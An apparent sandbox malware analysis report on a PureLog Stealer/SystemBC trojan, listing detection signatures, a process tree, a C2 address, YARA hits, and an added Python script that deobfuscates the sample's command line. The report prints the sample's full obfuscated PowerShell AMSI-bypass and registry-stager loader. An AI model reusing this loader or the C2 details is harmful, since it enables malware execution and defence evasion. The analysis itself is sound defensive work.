
Windows Analysis Report
vm6XYZzWOd.exe

Overview

General Information

Sample name: vm6XYZzWOd.exe (renamed because the original name is a hash value)
Original sample name: 133fda00a490e613f3a6c511c1c660eb.exe
Analysis ID: 1441717
MD5: 133fda00a490e613f3a6c511c1c660eb
SHA1: e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9
SHA256: cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169
Tags: 32, exe, trojan

Detection

PureLog Stealer, SystemBC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected SystemBC
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Drops VBS files to the startup folder
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Send many emails (e-Mail Spam)
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to resolve many domain names, but no domain seems valid
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Connects to many different domains
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Executes massive DNS lookups (> 100)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • vm6XYZzWOd.exe (PID: 6772 cmdline: "C:\Users\user\Desktop\vm6XYZzWOd.exe" MD5: 133FDA00A490E613F3A6C511C1C660EB)
    • $77a3a3b4 (PID: 1100 cmdline: "C:\Users\user\AppData\Local\Temp\$77a3a3b4" MD5: 133FDA00A490E613F3A6C511C1C660EB)
    • $778e373e (PID: 2944 cmdline: "C:\Users\user\AppData\Local\Temp\$778e373e" MD5: 133FDA00A490E613F3A6C511C1C660EB)
  • powershell.exe (PID: 3712 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UKPEWRGEIPej{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$diFffPduGehihq,[Parameter(Position=1)][Type]$PCksoXTjIn)$dnnozXtGtCr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+'s'+''+','+'P'+'u'+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+'S'+'e'+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dnnozXtGtCr.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$diFffPduGehihq).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$dnnozXtGtCr.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+'b'+'l'+[Char](105)
+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$PCksoXTjIn,$diFffPduGehihq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $dnnozXtGtCr.CreateType();}$lVayyyANUYcKS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+'af'+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$orrkynlqKpbkhN=$lVayyyANUYcKS.GetMethod('Get'+'P'+''+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+''+'d'+''+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'S'+''+'t'+'at'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IWmJQjKZijMLKdIaBfm=UKPEWRGEIPej @([String])([IntPtr]);$TBUJedRwibzVTgzCRnDIzS=UKPEWRGEIPej 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$njrYfxNAvhQ=$lVayyyANUYcKS.GetMethod('G'+[Char](101)+'t'+'M'+''+[Char](111)+'du'+[Char](108)+''+[Char](101)+'H'+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$MqmAuoaRJIuKTQ=$orrkynlqKpbkhN.Invoke($Null,@([Object]$njrYfxNAvhQ,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$QrVMcatQwspWdilEg=$orrkynlqKpbkhN.Invoke($Null,@([Object]$njrYfxNAvhQ,[Object](''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+[Char](114)+'o'+'t'+'e'+[Char](99)+'t')));$jNrufzt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MqmAuoaRJIuKTQ,$IWmJQjKZijMLKdIaBfm).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+''+'l'+''+'l'+'');$woXAbHxooZFxzUvIS=$orrkynlqKpbkhN.Invoke($Null,@([Object]$jNrufzt,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+'f'+''+[Char](102)+'e'+[Char](114)+'')));$DypfBWPoct=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QrVMcatQwspWdilEg,$TBUJedRwibzVTgzCRnDIzS).Invoke($woXAbHxooZFxzUvIS,[uint32]8,4,[ref]$DypfBWPoct);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$woXAbHxooZFxzUvIS,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QrVMcatQwspWdilEg,$TBUJedRwibzVTgzCRnDIzS).Invoke($woXAbHxooZFxzUvIS,[uint32]8,0x20,[ref]$DypfBWPoct);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('$'+[Char](55)+'7s'+'t'+'a'+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)" MD5: 
04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 4304 cmdline: C:\Windows\System32\dllhost.exe /Processid:{a7581e3a-9da7-4299-b4e9-0d87c1c78a48} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
        • wscript.exe (PID: 1848 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • $77Kaxhwswfup.exe (PID: 7056 cmdline: "C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe" MD5: 133FDA00A490E613F3A6C511C1C660EB)
      • svchost.exe (PID: 924 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 444 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 732 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1032 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1056 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1068 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1148 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1188 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1232 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1324 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1384 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1416 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1424 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1460 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1612 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1660 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1688 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1700 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1820 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1836 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1936 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1944 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1952 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • WMIADAP.exe (PID: 4836 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
      • svchost.exe (PID: 2024 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • spoolsv.exe (PID: 2096 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
      • svchost.exe (PID: 2188 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2204 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2240 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
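The powershell.exe command line in the tree above (PID 3712) hides every string it needs behind `'a'+[Char](109)+...` concatenation, resolves GetProcAddress through Microsoft.Win32.UnsafeNativeMethods, makes the start of amsi.dll!AmsiScanBuffer writable with VirtualProtect, overwrites its first six bytes, and then loads a .NET assembly from the registry value $77stager under HKLM\SOFTWARE and invokes its entry point. The Python below is an added triage example, not part of the Joe Sandbox report or of the sample: it folds the character-concatenation obfuscation back into plain literals, lists the strings that surface, and decodes the patch bytes. SAMPLE is a constructed excerpt assembled from fragments of the report's own command line (the variable names are the sample's); the function names and the regex approach are mine.

```python
import re

# Constructed excerpt of the obfuscated command line shown in the process tree
# (fragments copied from the report, joined with newlines for readability).
SAMPLE = r"""$njrYfxNAvhQ=$lVayyyANUYcKS.GetMethod('G'+[Char](101)+'t'+'M'+''+[Char](111)+'du'+[Char](108)+''+[Char](101)+'H'+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));
$QrVMcatQwspWdilEg=$orrkynlqKpbkhN.Invoke($Null,@([Object]$njrYfxNAvhQ,[Object](''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+[Char](114)+'o'+'t'+'e'+[Char](99)+'t')));
$jNrufzt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MqmAuoaRJIuKTQ,$IWmJQjKZijMLKdIaBfm).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+''+'l'+''+'l'+'');
$woXAbHxooZFxzUvIS=$orrkynlqKpbkhN.Invoke($Null,@([Object]$jNrufzt,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+'f'+''+[Char](102)+'e'+[Char](114)+'')));
[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$woXAbHxooZFxzUvIS,6);
[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('$'+[Char](55)+'7s'+'t'+'a'+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"""

# One operand of a '+' chain: a single-quoted literal or a [Char](N) cast.
PIECE_RE = re.compile(r"'([^']*)'|\[Char\]\((\d+)\)")
# A whole chain: two or more operands joined by '+'. This is a regex pass,
# not a PowerShell parser, so it assumes literals contain no escaped quotes.
CONCAT_RE = re.compile(r"(?:'[^']*'|\[Char\]\(\d+\))(?:\s*\+\s*(?:'[^']*'|\[Char\]\(\d+\)))+")
# The byte array handed to Marshal.Copy.
PATCH_RE = re.compile(r"\[Byte\[\]\]\(([^)]*)\)")


def fold_concat(expr: str) -> str:
    """Evaluate one 'a'+[Char](98)+'c' chain to the string it builds."""
    return "".join(chr(int(code)) if code else lit
                   for lit, code in PIECE_RE.findall(expr))


def deobfuscate(script: str) -> str:
    """Replace every concatenation chain with the equivalent single literal."""
    return CONCAT_RE.sub(lambda m: "'" + fold_concat(m.group(0)) + "'", script)


def extract_strings(script: str, min_len: int = 4) -> list:
    """Single-quoted literals of the deobfuscated script: APIs, DLLs, registry names."""
    return re.findall(r"'([^']{%d,})'" % min_len, deobfuscate(script))


def extract_patch_bytes(script: str) -> bytes:
    """Bytes written over AmsiScanBuffer; int(x, 0) accepts both 0xb8 and 7."""
    m = PATCH_RE.search(script)
    return bytes(int(x.strip(), 0) for x in m.group(1).split(",")) if m else b""


def decode_patch(stub: bytes) -> dict:
    """Recognise the 6-byte stub B8 imm32 C3 = mov eax, imm32 ; ret.
    0x80070057 is E_INVALIDARG: every AmsiScanBuffer call fails before scanning."""
    if len(stub) == 6 and stub[0] == 0xB8 and stub[5] == 0xC3:
        imm = int.from_bytes(stub[1:5], "little")
        return {"asm": f"mov eax, 0x{imm:08X} ; ret", "hresult": imm}
    return {"asm": None, "hresult": None}


def triage(script: str) -> dict:
    """Everything an analyst wants from this one-liner in one dictionary."""
    return {"strings": extract_strings(script),
            "patch": decode_patch(extract_patch_bytes(script))}


if __name__ == "__main__":
    result = triage(SAMPLE)
    print("\n".join(result["strings"]))
    print(result["patch"]["asm"])
```

Run against the full command line from the report, the same pass also recovers the names the sample gives its dynamic delegate type (ReflectedDelegate, InMemoryModule, MyDelegateType), which is why the "Found suspicious powershell code related to unpacking or dynamic code loading" signature fires.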
Name: SystemBC
Description: SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on an underground marketplace, Proofpoint decided to call it SystemBC. SystemBC has been observed occasionally, but more pronounced since June 2019. First samples go back to October 2018.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc

Extracted malware configuration (SystemBC):
{"NDATAHOST1": "212.162.153.199", "HOST2": "212.162.153.199", "PORT1": "4382"}
Yara matches in memory dumps (Source | Rule | Description | Author):
00000000.00000002.2335244662.0000000007550000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000000.00000002.2329340296.0000000007060000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000015.00000002.2765221836.0000000004770000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
(17 further entries not shown)
Yara matches in unpacked PEs (Source | Rule | Description | Author):
21.2.$77Kaxhwswfup.exe.5e0cba8.9.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
21.2.$77Kaxhwswfup.exe.38c1cd8.2.raw.unpack | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security
21.2.$77Kaxhwswfup.exe.46d04d0.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.vm6XYZzWOd.exe.3c166a4.0.raw.unpack | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security
6.2.$778e373e.400000.0.unpack | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security
(25 further entries not shown)

                      System Summary

                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UKPEWRGEIPej{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$diFffPduGehihq,[Parameter(Position=1)][Type]$PCksoXTjIn)$dnnozXtGtCr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+'s'+''+','+'P'+'u'+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+'S'+'e'+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dnnozXtGtCr.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$diFffPduGehihq).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$dnnozXtGtCr.D
efineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$PCksoXTjIn,$diFffPduGehihq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $dnnozXtGtCr.CreateType();}$lVayyyANUYcKS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+'af'+'e'+''+'N'+''+[Char](97
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UKPEWRGEIPej{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$diFffPduGehihq,[Parameter(Position=1)][Type]$PCksoXTjIn)$dnnozXtGtCr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+'s'+''+','+'P'+'u'+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+'S'+'e'+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dnnozXtGtCr.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+